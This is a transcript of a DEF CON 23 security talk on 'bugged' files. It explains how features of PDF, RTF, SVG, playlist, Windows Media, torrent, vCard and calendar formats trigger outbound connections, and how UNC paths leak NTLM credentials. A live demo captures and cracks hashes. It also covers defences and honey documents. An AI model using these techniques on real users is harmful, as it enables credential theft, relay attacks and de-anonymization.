 welcome. Welcome to DEF CON 23. I hope you all have as much fun as I generally have. So to start off, this is the talk bugged files. If you're here for some other talk, then you're in the wrong room. Let's start out by introducing ourselves. My name is Damon Smith. I am a security engineer with NCC group. I work alongside this handsome man. Traditionally, I focus mainly on web applications and network level security and embedded devices. But recently I've begun doing file format research with this man right here. And this man right here is Daniel Crowley, as aforementioned handsome. Thank you. I like web applications and crypto and fiddling with file format. So this is right up my alley, which you would hope because I'm up on stage talking to you about all of this. So yeah. Just so you know, we're from Austin, Texas. Anybody? Yay. And there's this local meetup there called Austin Hackers Anonymous, aha. And heckling is a time-honored tradition there. So if you have something funny, feel free to shout it out. But only if you're funny. If you're not funny, please just stay silent. So let's begin. So what is this talk about? This talk is about abusing features of file formats to make files that trigger outbound traffic when opened. And there are some caveats to this. We focused our research in particular directions because if we were to stand up here and say, ah, I can make an executable that calls out when you open it, well, yeah. Okay. So it's slightly more interesting things like document formats, media formats, that sort of thing. And this does not, the important thing to keep in mind here is that none of this is exploitation, well, it's sort of exploitation. But it's not exploiting any sort of bug, right? These are not mistakes so much as usual vulnerabilities are. We're talking about features in file formats, features in parsers that allow for this sort of thing to happen. All right. So why do you care? Why are you in this room? We have broken it down into three main reasons that this stuff is important. The first and most obvious is privacy. There are a lot of obvious privacy implications. There are also some more hidden privacy implications. We're going to go over each one of these points in detail during the talk. But just briefly, we're talking DRM, files that phone home as soon as you open them for tracking their use. Data loss prevention. Files that exist on a corporate network that as soon as they're opened outside of the corporate network, they phone home to let someone know that they've been breached. De-anonymization. Additionally, there's some real security implications to this that we're going to go over a bit more in depth later. We have files that as soon as you open them, we'll send NTLM credentials to an attacker. Finally, as Dan mentioned, all of these things are features. They're not bugs. They're not both for overflows. They're not going to be fixed on patch Tuesday. These are going to be around for years. They're going to keep working. So that's what makes these bugs different than your standard buffer overflow type bugs. So we're going to start out with a little demonstration. I'm sure a lot of people, they heard like, oh, credentials. Credentials. Let's see it. So we're going to show you two demonstrations now. One with RTF and one with SVG. Quick prayer to the demo gods, please. Did you bring the live chicken? Does anybody have a live chicken? I've got the ceremonial dagger, but okay. Well, we'll just have to hope for the best. So I guess I'll tell you what he's doing while he's doing it since he can't hold his microphone and use his computer at the same time. I know, I know. You see in front of you a standard Windows image. Windows 8.1 fully patched, fully up to date. Nothing up my sleeve, nothing up my sleeve at all. What you don't see is the Cali image that is running in the background on this machine that's going to be capturing credentials. If we're lucky. Come on, pray harder, demo gods. This doesn't look good. It's hard drawn activity. Something's wrong with your disk. I guess this is the failure of putting demos at the beginning of your talk instead of the end. Oh, yeah, great. It's moving. It's working. That's good. Here we have a completely normal document. I'm just muttering to myself. Don't listen to me. You may be at the wrong talk. See, that's funny. Do that. See, don't do that. That wasn't funny. Be meaner. Come on. Credit where credit is due. Thank you. Thank you. He's available for parties, bar mitzvahs, weddings. Yeah, working on it, pal. I swear it worked five minutes ago. This is why all the jokes about demo gods. No virus protection. This is how we roll with DEF CON. Am I right? We are waiting to enter the password into the Cali Linux machine. You know what? This is not going well. So let's try this towards the end. We will re-visit the demos later. Back to the presentation. All right. So, thank you. Without the best demo you'll see at DEF CON this year. We'll try again later on. Hopefully it'll work later once it's finished thinking about it. So there's already a number of formats that are known to allow this. There's been some research into office document formats. There's playlist files. There's shortcut files. That's an interesting vector because as soon as you open up a folder with one of these files in it, it triggers this interaction. Interestingly, HTML, yeah, it's obvious that you can do remote references with this and call out. That's kind of the whole point. Yes. Hyper text. Not like calm, uncaffeinated text. But you can also do NTLM references which certain browsers, namely Internet Explorer, will work. So in Internet Explorer you can actually do like image source equals SMB URL and that's actually the trigger is when Windows tries to do SMB communication. If that SMB service asks for NTLM authentication, Windows will take your current cache credentials so whoever you're currently logged in as and attempt to do NTLM authentication using those credentials. Interestingly, also if you receive an HTML formatted email through Outlook and it has images which do the same sort of thing, reference an SMB share, this will trigger the interaction as well. So that's what's been done in the past. Let's talk a little bit about what our research focused on. We were specifically targeting your average corporate Windows build. So things that your average user in a corporate environment is used to opening as email attachments. These are document formats. These are media formats like images or audio or video and stuff like that. Additionally, we also looked at groupware stuff like Outlook stuff, so meeting invitations, contact cards. We wanted formats that the average corporate user is used to receiving in their inbox every day and double clicking it without thinking. So just a quick note here. Up at the top, you'll see like R pipe N. So this is some quick notation so you know that this particular format supports ordinary remote references at all but additionally NTLM credential capture or relay stuff. So PDF supports both. Just a quick note. So PDF, there's a couple different ways that we found. You can actually embed remote images into PDFs which is like, well, interesting. Okay. Great. PDF is a very interesting format. The 1.3 specification is some like 300, 400 pages long. So it's a wonderful read if you are like having trouble sleeping on the plane. So anyway, so remote images. This is one of the simplest ones. So you just embed a remote image in a PDF and it'll call out when you open it because it has to try to load that image, of course. There's also JavaScript support in PDF. Anybody out there who didn't know that PDF support JavaScript? You're all very educated on the PDF format. You're probably in the right talk. Good. So you can pop open a media player using JavaScript with app media open player and this supports SMB URLs. That's not technically. UNC paths. And the same thing with get URL which is another sort of PDF specific JavaScript function. One really funny thing. Actually Damon, I'll let you talk about the warning here. So it does issue a warning as soon as you embed one of these and one of these SMB URLs in your document. It says you're trying to connect to hostname attacker.com. Do you want to allow this? What's funny, if you're familiar with UNC, you might be familiar with long form UNC. Traditional UNC path is slash, slash host name, slash share name, slash file. Long form UNC is slash, slash question mark, slash host name, slash share name, slash file. I don't know why it exists but it does. And as you can see from this cute little error message, it actually says this document is trying to connect to home. Do you want to allow this? So yes, it's still a warning message. And it's kind of funny that we can make it kind of an obscure and bizarre warning message. But yeah, I can't tell if this is more or less shady than like would you like to connect to completely legitimate site.com. But you know, there you have it. So the next file format that we got a quick win on was the RTF format. This is one that you will hopefully see a demonstration of later in our talk. This slide would make much more sense if you had already seen the demonstration. But anyways, the technique that's used for RTF, you are allowed to embed links to remote documents in an RTF file. I don't know why that's the case but it exists. So the cool thing about the RTF proof of concept that we cooked up is that it works in both Word and WordPad. So it doesn't matter if they have office installed or not, if they open this RTF file, I'm going to get their NTL and credentials. Even more hilariously, it does issue a warning saying this document has links to remote content. Do you want to allow this? But the funny part and the part that you'll hopefully see in our demo in a minute is that it has already sent your credentials before it shows the warning. So not the most useful warning in the world but hey, what are you going to do? So there is an image format called SVG, scalable vector graphics. And in contrast to traditional image formats where you have just, you know, a bunch of data about the dimensions of the image and then the raw color data encoded into some format, SVG is actually a sort of a series of instructions for how to build the image. Kind of like how HTML is like a series of instructions for like what to put where. SVG is kind of similar. And what's interesting about SVG is that it looks a lot like HTML. It's an XML based format. And it actually supports a subset of HTML and some of that. So you can actually have remote style sheets. So you can import a cascading style sheet from a remote location. And there's also support for JavaScript in SVG which is fucking hilarious as well. Your images have JavaScript in them. Welcome to the future. So SVG, you can use a UNC path or rather a file URL which basically is you know, when you're referencing a remote host file path for Windows is going to use SMB, right? So SVG, we can use that as well. So the next one, in 3U PLS, basically all of the playlist formats. The core goal of these formats is to have a list of media files that will be played in sequential order. So obviously these are going to be able to make remote references. What is perhaps less obvious and maybe not such a great idea is that they're allowed to reference UNC paths. I know for fact that I've never had a playlist that needed a legitimate reference to a UNC path. I can't imagine why that's a feature. But it is. So you open our little playlist and we get your credentials. So that's kind of cool. It's worth mentioning at this, you have questions, sir? So the question is, is two factor authentication a reasonable mitigation against this? My response is that it's far too complicated. This is a much simpler problem. Yes, you should do two factor authentication, 100 percent. Absolutely you should do that. But this is a much lower level problem than that. It should not be the case that when you open a file format, it is allowed to send your credentials to a remote party. That should never happen. Especially without your interaction. So it's worth mentioning at this point that the handling of UNC paths is sort of done, I'll get to you in just a moment sir, I promise. It's done at a different level than you might imagine. So the parser that's working with an M3U or a PLS or something like that on Windows, it's expecting either a URL or a file path. Now, if you give it something that isn't a URL, it doesn't start with like HTTP, colon slash whatever, it's going to just say, hey, Windows, you handle this, right? So in many places where you're calling out to some file path where you're consuming a file path and then pulling the file from the file system, Windows is actually handling this and goes, oh, this is a UNC path. I know what to do with this. So what enabled us to do a lot of these things, and they're just kind of mentioning this at a random point, I know, but Windows is actually going to handle this and not the parser. So the fact that a lot of these support UNC paths is not so odd when you understand that. Now, we had a question. That is an excellent question. The question is, other than the default parsers that we have shown, are other parsers also vulnerable? My answer is, we don't know. We didn't check. We did look into it, but it wasn't our primary focus. Our core focus was your stock corporate build, which is going to have Adobe Reader and it's going to have probably Internet Explorer as the default browser, let's be honest. What I can tell you, sorry, go ahead. What I can tell you is that for PDF specifically, we did look into that more than any other format. I can tell you that most PDF readers out there support only a small subset of the full PDF functionality because, as I mentioned, it's flipping huge. Absolutely huge. Crazy things in there. Great. I mean, like, we could do an entire talk just about PDF. If you're interested in PDF and all its weirdnesses, I can recommend OMGWTF PDF by Julia Wolff. Great talk. So great talk if you want to look more into PDF. But Chrome's PDF reader, which is like, I think it's just PDF.js, which is like Firefox's, Mozilla's, like JavaScript based PDF renderer. It doesn't support a wide range of things. So none of these techniques work on Firefox's built-in PDF reader, Chrome's built-in PDF reader, preview.app. It's pretty much just Adobe Reader and Adobe products that will like do the whole set of functionality. So these, the techniques that we mentioned for PDF work on Adobe Reader and that's what we've tested it on. So, good question. You take this one. Okay. So the next family of formats that we looked at is the ASF family of formats, which maybe you've never heard of. But some of the implementations of ASF include Windows Media Audio, Windows Media Video, or your classic ASF file. I know it may shock you, but your Windows Media Video file has the ability to fetch from a URL when you open it, which is incredibly bizarre. I can't imagine why this functionality exists. You play a video file and it goes and retrieves information from a remote, it actually pops open your web browser to a remote URL, which is completely insane. And since the average corporate build, the default browser is going to be Internet Explorer and Internet Explorer has the ability to fetch images from an SMB path. What this means is you open our video file and it sends us your NTL and credentials. The particular technique here is called URL and exit. Basically, you're allowed to embed scripts that are executed at a certain point in the video file. So for instance, five seconds into the video file, run this script. Traditionally, this is used for including closed captioning information in a video file. But with this URL and exit command, it opens a URL in the default browser and then stops playback of the media. So you can see how this might be applicable to a bunch of different things. And even if your default browser isn't IE, if it pops open like RIAA.org slash I am a pirate.html, you can see where I'm going with this. But yeah, it's kind of odd. So MP3 is both a loss and a win. So MP3 by itself is a very simple format. You have like a fixed sized block of data which defines like here's what the next block of audio is going to need to be rendered like. And this is what allows for things like variable bit rate because you can say this block I want this bit rate and this next block I want this other bit rate. So it's just block of metadata, audio data, block of metadata, block of audio data. There is an extension which is not actually part of MP3 but sort of de facto has become a part of the MP3 standard which is ID3. It's a tagging format which is just sort of tacked on to MP3 in a modern context. So we looked into ID3 and there's some interesting stuff in there. And there's a frame that says hey, there's the frame that's supposed to go here is actually in this remote location. And then there's also the attached picture frame which is like if you open up Windows Explorer and you see like various pictures of Albemard or whatever when you look at an MP3, that's because there's an embedded picture in the MP3 file in the ID3 tag. So that actually supports remote pictures as well. Unfortunately, with every player we tried and we tried a lot of them, these features don't work. So one of the things we learned throughout this is that like what the RFC says and what the player, the parser actually supports are two different things. We did find some interesting things while reading through the ID3 spec though. You might be wondering why there is a brightly colored fish as a picture for this slide. It doesn't really seem to make sense. Well that's because you can tell in the APIC frame you can say what type of picture is actually being attached to the MP3 in the ID3 tag. And there's like a number that says like what kind of picture. And number 13 is a brightly colored fish. Why? I have no idea. Another fun fact, Primus is its own genre in ID3. So there you have it. So at least reading the RFC wasn't a complete waste because I had a good laugh or two. I mean everybody knows but that, come on, be nice. That's hateful. So yeah, but the fun thing is if you take something like a WMA file and just rename it to an MP3 and Windows Media Player consumes it, it's like oh this is a WMA. It's just named an MP3. Yeah, okay. You want me to pop up a URL? All right, sure, here you go. Sort of a win, sort of a loss, you know. So the next one we looked at that is kind of obvious actually is torrent files. The whole point of these files is to embed a list of trackers from which you can obtain peers to download a file, right? So you would think oh, of course it's going to make remote references. But what we found that's a little bit more interesting is what are the implications of a torrent file that makes arbitrary remote requests? So we are in the process of creating the one torrent file to rule them all, which is basically one torrent file that has a list of every known cross-site request forgery vulnerability in your standard home router that will go through these URLs one after the other trying to pop a shell on your router as soon as you open this torrent file. So even though it's kind of obvious that torrent files are meant to embed remote references, when you consider the implications like cross-site request forgery, they become much more interesting. This is not so bad though because people don't generally open torrents and then just leave them running on their computer for hours or days. So I mean it's not that bad. But yeah. We found an interesting thing as well. There's support for URL seeds, so you can have like an FTP server or an HTTP server to serve as an alternate seed in case the swarm is not like that doesn't have, in case there's no peers or seeds active. But this is, we weren't able to find any players that supported this so that's unfortunate. Next we have the V card format. So this is kind of like a contact card, a virtual contact card where you send somebody the virtual equivalent of business card and then they have, you know, your picture of you and your email address and your phone number and full name and all this wonderful stuff. One of the interesting things that's in there is a free busy URL. So it's a URL that your male user agent can check or rather your calendar user agent can check to see when is this person free or busy. And normally this is specified as an HTTP URL but as it turns out you can use a UNC path. So this does require specific actions. I would need, if you were to be exploited by me using this, you would need to receive my contact card, import it and then try to like see when I'm free or busy because that's when the interaction actually triggers. But, you know, any of you who have done any social engineering this is not necessarily a hard thing to do like, hey, you know, I need to have this meeting with you, please, you know, find some availability and, you know, here's my contact card, whatever. So the next format we looked at is the iCal format ICS. This is the standard when you receive an email that says I want to schedule a meeting with you. There's a decent chance that the attached file is actually an ICS file. This is another really sad instance of people not following the RFC. Through this research we basically discovered the three essential steps to building a parser. Step one, read the entire RFC. Step two, forget everything you just read. Step three, light the RFC on fire. Then write your parser however the hell you want. So reading the ICS file specification we found some very interesting and very scary items that are included. You are allowed to set an alarm as you're probably all familiar when you set up a meeting. I want to be reminded 30 minutes before, I want to be reminded two days before whatever. These alarms have certain actions attached to them. So 30 minutes before the meeting I want an email to be sent to me. 30 minutes before the meeting I want a little noise to play for my cell phone. Those are the different options that are available in the alarm category. One option that is actually kind of terrifying is called procedure which means run this program with these command line arguments 30 minutes before the meeting. I don't know why that would ever have a legitimate use case. I don't know why that's in the format but to put you all at ease none of the calendar agents that we tested actually support that. So you're not going to have calendar agents opening programs 30 minutes before a meeting. Nothing crazy like that. I'm kind of sad but I'm also kind of relieved like at least it's not that broken. They got this one right. Yeah well you know. All right but I'll tell you what it's great for trolling because you can define as many alarms as you want and it's defined by the calendar invite itself. So if you want to say like yeah let's have a meeting in 30 minutes and every single minute from now until then pop up an alert and you know play an alarm sound like. I haven't done that yet but that's coming. So obviously there's a bunch of different ways that you could deliver these documents. Obviously via email you could do this by distributing these on some open file share. You might have you know let's say that you compromise some site that you know a target is going to be on. You might replace a document with a bug version. The P2P distribution that's pretty obvious vector for this sort of thing. And then we have Honeypot. So this is one of the more interesting things we thought of as uses for this. So let's say that you wanted to see if somebody had gotten into your company's trove of you know documents. You might bug one of them. Like put a bug file in there like you know something juicy like salaries 2016.pdf or some such. And then you know that but that file has no legitimate usage. That doesn't actually contain anything but when somebody you know opens it they're not supposed to do that and you get a notification about that. So that's actually kind of an interesting you know blue teamy sort of use for this. Yeah like a honey document. Alright so we've talked a little bit about what we're able to do. Now let's talk a little bit about how we think this could be applied. One of the more worrying potential uses for this is a dystopian future DRM that every time you open this document it calls home. This is a little bit more troubling than your standard DRM which is their only purpose is to prevent you from playing or viewing a document when you don't have a legitimate need for it. This goes beyond deterrence into identification. Not only do they prevent you from opening the file but they know who you are they know that you tried to open it. So this is kind of scary stuff. And this is you're able to do this today. Nothing is stopping this from happening today. So there's sort of another side to the data loss prevention. There's sort of like the honey document idea but there's also the fact that let's say that you're trying to you know be a whistle blower. You're trying to leak some important information. What you feel is information that should be public knowledge because of some wrongdoing. But you get you know like some important document that's been bugged. And then you know all of a sudden you know the people who own this document who have bugged this document see it opened from your work computer then your home computer and then you know wherever you shared it you know all of a sudden this is known to this party this bugging party and you get disappeared. So that's a little bit scary. So one of the most obvious implications of this de-anonymization. If you've ever used the Tor browser bundle which don't admit it because you don't want people to know that you use it that defeats the point. But anyways if you've ever used it and you've ever downloaded a file through the Tor browser bundle it'll pop up this cool little warning message that says hey we're going to parse this file in an external application. There is a chance that this external application will unmask you because it might not go through Tor. You should be very careful opening this file. This research is the reason that warning exists. Take that warning seriously. If you are opening files they can track you even if you're using the Tor browser bundle. I think you're a little bit safer if you're using the Tails live CD because it routes all traffic through Tor. I don't know. I'm not an expert don't listen to me. Don't open files. Yeah we actually don't want to talk. We're just going to leave now. Yeah, yeah. Drops mic. Additionally maybe you are working for a government agency. You do not own or control the jihadist wiki. You are not an administrator on the site. But you do have the ability to for instance upload a PDF file called how to make a bomb in three easy steps. And then everyone that opens that file you know this person is interested in making a bomb in three easy steps. So you've de-anonymized that person. We've sort of beaten this one to death already. Like we've mentioned this a billion times at least and you know definitely not exaggerating there. But NTLM credential capture and relay. So we I've already discussed all this so this is sort of in here for posterity but I'm going to move on since we have limited time and I really want to try to get that demo to work. But for those of you who are not aware of how NTLM relaying works I'm going to go over it really quickly. So there's obviously the fact that if I get your NTLM hash I can crack it but what if you have a strong password. So this is the way it normally works. I say hey server I want to negotiate I want to access whatever it is you've got whatever your sweet sweet goods are I want them. And the server says ah well first here's a number mix it in with your hash and then send that back to me. And so once that happens you're authenticated. But if you can get somebody to try to authenticate to you there's actually no like authentication. I mean there's client authentication but there's no server authentication. Like there's nothing about the communication that ties the communication to a particular server just to the client. The server doesn't have to authenticate itself. So if I get a connection from you I then pass that along to the server and pass the information back and forth and I never have to learn the password. I just have to get you to go through the steps and give me access at which point I tell you sorry no that didn't work would you like to try again and then I pass it to a different server. So I can if I can get you to try to authenticate to me via NTLM I can authenticate to anybody that takes those credentials and actually multiple parties. So that's fun. So something we've already discussed a little bit but it's worth talking about in further detail cross-site request forgery. A lot of people are opening these documents from a privileged network position. They're inside your corporate firewall or they're on your home network or whatever. This means that the person who crafted the document is able to access these resources in a limited way. For instance they could browse to your router slash shutdown.html or whatever. They will have the ability to send a cross-site request forgery attack from a privileged network position to a vulnerable device as I discussed with the torrent file. Sometimes as we discussed earlier the format that the parser that will initiate this outbound traffic will actually pop up in words. Pop open your default browser and if you'll have an authenticated session with some site, any site in that default browser then it will ride on those credentials. So you have your sort of classic confused deputant attack, your classic C-surf attack there. So we thought about mitigations. I don't think we should spend too much time on this but AV is not going to be effective against this because there's too many different ways to do this, too many formats and there's a possibility of false positives. It is a legitimate functionality to have remote images in PDFs. How legitimate, well that's a good question but it is legitimate functionality, it's in the spec. So having a remote image in a document isn't necessarily bad just like having a one by one pixel image that is transparent on an HTML page or in an email that's clearly for tracking purposes that's legitimate, question mark. So AV is not really an effective defense. You can change the formats but again there's way too many formats and people are already like using the formats as they are so like you might be killing legitimate functionality by changing the formats. Application level firewalls are a really good defense something like little snitch for OSX or zone alarm or leopard flower for Linux. These are good mitigations against this for some things so like I don't ever want Wordpad to be talking to a remote server. I don't ever want that ever. So if I ever see that pop up and you know little snitch I'm going to say fuck no, absolutely not. But for something like M3U like yeah I wanted to connect to you know last FM or whatever. So it's not a perfect solution. So a few other mitigations that we considered. Warnings. This is the classic PNCF for the information security community. More warnings. So yes you could have more warnings. We do want to see more parsers that warn their users hey this document is about to do something that's kind of sketchy. This document is about to send tracking information to a remote party. But as we all in this room are probably aware every user clicks okay on every warning box ever. It doesn't matter what it says like you get a warning box that says opening this file we'll set your house on fire and they will still click okay. So that's why it's not a great mitigation. Additionally we could do something that actually hooks the lower level networking libraries. If you've ever used proxy chains it's a pretty cool little tool. It routes all traffic from an application through a proxy by hooking low level networking libraries. Unfortunately this isn't perfect either. First off it's very difficult to set it up. Like it's kind of annoying. Additionally it doesn't work on every application. For instance I think Chrome does not allow the use of proxy chains because it prevents use of the LD preload command which is how proxy chains works on Linux at least. Additionally egress filtering. This is something that you should all be doing already. You should all be blocking for instance Intel or SMB traffic at your corporate perimeter. If you're not doing that you're behind the times. You need to catch up. But even egress filtering is not perfect because yes you may be able to block SMB traffic but you can't block HTTP traffic like everyone allows port 80 through every firewall ever. So it's still not a perfect solution. So this is normally the point where we take questions but I'm going to be on hope that this demo will work now. Demo gods. Please be with us now. Let's give this a shot. See if we can see if we can get this to work now. I guess I can take questions while he's setting up the demo. So we'll do that to save time. Any questions? Yes? Sure. So the question was what tools are available to see what it's trying to connect to when you open a file. The best ones are going to be your application level firewalls. So if you're on OSX you're going to want to install a little snitch. And when you open this PDF file it's going to say hey your PDF reader is trying to connect to a remote host. Do you want to allow that? And I think what did you call it? The fuck no I don't ever want that button. Click that one. Click the one that says no. Never allow this thing to connect to a remote server. That's for OSX's little snitch. On Windows it's zone alarm. On Linux it's leopard flower. Any other questions? Yes? So could it be a script? Oh, so the question is do any of the parsers support fetching something that might be a script or executable code and executing them? Sort of would be my answer. Not directly but keeping in mind that for instance what we, the stuff that we saw for the Windows media video files. It opens your default browser and goes to a web page. So it's not directly executing code but it's fairly, it's common knowledge on how to exploit Internet Explorer to get code execution. That happens regularly. So you know you send, you give a video file that embeds a link to your, you know, your Metasploit browser auto-pwn or whatever it's called these days. So it's not directly executing code. We didn't find anything that could do that but there are paths to code execution. Any other questions? Over there. Did we look at parsers for mobile platforms was the question. Unfortunately we did not research mobile platforms. There's a good chance that a lot of these techniques are going to work on a mobile platform. For instance if you're using Adobe Reader on your mobile there's a good chance that the stuff that we found for PDFs is still going to work. Additionally it's very common that mobile versions of software are at least a few versions behind their desktop counterparts. So the version of Adobe Reader that you have on your mobile might be out of date and it might even be, it might not even show the same warnings that your desktop client does. Any other questions? Yes. So the question was can some of these bugs be mitigated through policy settings? The answer to that is some of them yes. All of them no. So I'm not exactly sure which ones can. I'm pretty sure that the Windows Media Video, Windows Media Audio stuff can be affected by group policy but don't quote me on that. So in general no. Group policy is not an effective mitigation. That would be my answer. Any other questions? Yes. Was the question what am I going to get in a VM environment? Sure. So for the purposes of these techniques that we're showing today a VM is functionally equivalent to a regular computer. So if you open one of these documents and it triggers SMB traffic I'm going to get the credentials for that VM. So it doesn't really change when you move to a VM in general. Yes. Are you talking about the demo? Sorry. I hate to harp on this because everyone harps on this but I think user education is a critical component to fixing this problem. I know that there are a lot of debate about whether user education actually works but people need to know that this stuff is dangerous. People need to know that opening a file can track you. People need to understand the implications of opening these files. Even if this file doesn't have a memory corruption exploit in it it can still do bad things to you. I think that's one of the most important things that you can tell your clients. User education they need to understand that this stuff is dangerous and that this stuff is out there. Everyone opens every file ever. So technical mitigations beyond user education. You already mentioned egress filtering which I think is one of the best that you can apply to corporate wide mitigation but even that obviously it isn't perfect. Yikes. Application level firewalls. I think that's the best answer I can give and that's not a very good one. I'm sorry. Any other questions? Yes. As far as I'm aware, no. There's no way to say only auto authenticate to UNC pass in this particular domain. Oh the demo is ready so we'll take a bit more questions after the demo. All right. So charge. So we've got an RTF file here. I'm just going to open that real quick. And so we've got this warning. Hey this document contains links to other files. Do you want to update? No I do not. That sounds sketchy. But if I pull this over here you can see that I've already captured the hashes. So that's fine. It's like closing the gate after the horse has left the barn. Am I right? So that, oh no I don't think I want to do that actually. Let me not. Let me not do that. So let's go ahead and close this and then I'm going to open this. Let me just clear my, nothing up my sleeve here. I'm just going to clear the thing so you can see I've got this cleared. I've got this cleared. And I'm going to go ahead and open up this SVG and see it doesn't show anything although we could make it show something. And again we have captured hashes. And from here I'm just going to go ahead and crack quickly. I've got like a crap password here. So just going to run John. So just run it through John quickly and made it a really easy password so it would crack instantly and you don't have to wait a long time but that's a bit too late for that now. Sorry about the way. The username is throw away and the password is also throw away in case that it wasn't obvious. Right. So here we've, again just to review, this is not an exploit. This is features of Windows. This is features of SVG. This is how it's supposed to work. Yes. And this is what we get. Right. So just by opening an SVG, an image file, a video file, a document. And this is like, we don't even have office installed in this. This worked in WordPad. Right. So all of a sudden, this happened. Right. So thank you for waiting patiently for the demo to work. I'm glad it finally did. We finally did it. Thank you. Thank you very much.